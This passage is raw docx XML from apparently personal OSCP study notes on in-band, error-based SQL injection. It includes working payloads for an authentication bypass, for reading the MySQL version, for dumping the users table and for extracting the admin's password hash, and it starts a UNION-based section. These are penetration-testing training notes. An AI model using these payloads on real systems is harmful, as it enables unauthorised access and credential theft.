      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000167C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000167D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In-band definition</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000167E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="691"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL injection is considered </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">in-band</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> when the vulnerable application</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> provides the result of the query along with the application-returned value</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. In this scenario, we've enabled SQL debugging inside the web application; however, most production-level web applications won't show these error messages because revealing SQL debugging information is considered a security flaw.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000167F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001680">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001681">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now we can do authentication bypass:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001682">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="891"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="2700338" cy="832604"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="262" name="image255.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image255.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId449"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2700338" cy="832604"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001683">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="891"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">offsec' OR 1=1 -- //</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001684">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001685">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can also use error-based payloads to do more, like enumerate the database</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001686">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001687">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We're using the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IN</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">operator to compare a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">boolean </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">value (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1=1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) with what should be a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">numeric </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">value (the database version). If this causes an error (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">which it should</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), the application might indicate which values caused the error and thus allow us to get the database version number (since it will run the SQL command)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001688">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1020"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is why this is an "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">error-based</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001689">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000168A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000168B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at version number:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000168C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' or 1=1 in (select @@version) -- //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000168D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="597"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MySQL accepts both </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">version() </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">@@version </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">statements.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000168E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="597"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4224338" cy="758214"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="21" name="image12.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image12.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId450"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4224338" cy="7582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8F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="597"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The running MySQL version (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">8.0.28</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) is included along with the rest of the web application payload. This means we can query the database interactively, like how we would use an administrative terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001690">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dump Tables:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001691">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' OR 1=1 in (SELECT * FROM users) -- //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001692">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001693">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you receive an error like this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001694">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4691063" cy="879574"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="368" name="image356.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image356.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId451"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4691063" cy="87957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95">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="435"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then that means you can only specify one column at a time, as shown in the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Operand should contain 1 column</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001696">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001697">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dump Tables one column at a time:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001698">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' or 1=1 in (SELECT password FROM users) -- //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001699">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="673100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="59" name="image77.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image77.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId452"/>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169A">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is somewhat helpful, as we managed to retrieve all user password hashes; however, we don't know which user each password hash corresponds to. We can solve the issue by adding a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> clause specifying which user's password we want to retrieve, in this case,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169B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' or 1=1 in (SELECT password FROM users WHERE username = 'admin') -- //</w:t>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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4529138" cy="558884"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="198" name="image201.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image201.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId453"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4529138" cy="55888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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nice! We managed to predictably fetch hashed admin credentials via the error-based SQL injection vulnerability we discovered.</w:t>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pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_fnd2dwy2tebp" w:id="188"/>
      <w:bookmarkEnd w:id="188"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION-based SQL Injection Payloads</w:t>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t xml:space="preserve">From OSCP (10.2.2. UNION-based Payloads)</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Whenever we're dealing with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">in-band (opposite of blind SQL injection) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL injections and the result of the query is displayed along with the application-returned value, we should also test for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION-based</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL injections.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016A6">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The</w:t>
      </w:r>
      <w:hyperlink r:id="rId454">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
